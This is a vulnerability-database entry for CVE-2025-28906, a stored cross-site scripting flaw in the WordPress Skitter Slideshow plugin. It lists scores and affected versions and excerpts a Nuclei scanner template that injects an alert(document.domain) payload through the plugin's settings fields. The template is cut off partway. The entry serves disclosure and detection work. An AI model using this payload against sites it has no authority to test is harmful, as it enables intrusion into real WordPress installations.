CVE-2025-28906
published 2025-03-11CVE-2025-28906: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Thiago S.F. Skitter Slideshow wp-skitter-slideshow allows…
PriorityP428medium5.9CVSS 3.1
AVNACLPRHUIRSCCLILAL
EXPLOIT
EPSS
0.49%
38.6th percentile
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Thiago S.F. Skitter Slideshow wp-skitter-slideshow allows Stored XSS.This issue affects Skitter Slideshow: from n/a through <= 2.5.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thiago_s.f | skitter_slideshow | <= 2.5.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
nuclei·CVSS 5.9
CVE-2025-28906 Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
Skitter Slideshow alert(document.domain)&wp_skitter_xml=&wp_skitter_theme=square&wp_skitter_animation=random&wp_skitter_type_navigation=numbers&wp_skitter_width=&wp_skitter_height=&wp_skitter_background=%23000&wp_skitter_crop=true&wp_skitter_velocity=&wp_skitter_interval=&wp_skitter_navigation=true&wp_skitter_numbers_align=left&wp_skitter_label=true&wp_skitter_label_animation=&wp_skitter_width_label=&wp_skitter_easing_default=&wp_skitter_controls_position=&wp_skitter_focus_position=&wp_skitter_with_animations=&wp_skitter_auto_play=true
- |
GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_4 == 200"
- "contains(body_4, 'alert(document.domain)')"
condition: and
extractors:
- type: regex
name: nonce
part: body_2
gro
No writeups or analysis indexed.
2025-03-11
Published